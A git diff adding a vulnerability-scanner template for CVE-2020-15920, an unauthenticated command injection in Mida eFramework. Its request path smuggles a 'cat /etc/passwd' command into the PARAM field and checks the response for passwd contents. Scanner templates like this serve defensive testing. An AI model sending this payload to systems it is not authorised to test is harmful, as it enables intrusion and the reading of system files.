diff --git a/cves/CVE-2020-15920.yaml b/cves/CVE-2020-15920.yaml new file mode 100644 index 0000000000..55986cde7e --- /dev/null +++ b/cves/CVE-2020-15920.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-15920 + +info: + name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php' + author: dwisiswant0 + severity: critical + description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required. + + # References: + # - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html + +requests: + - method: POST + path: + - "{{BaseURL}}/PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body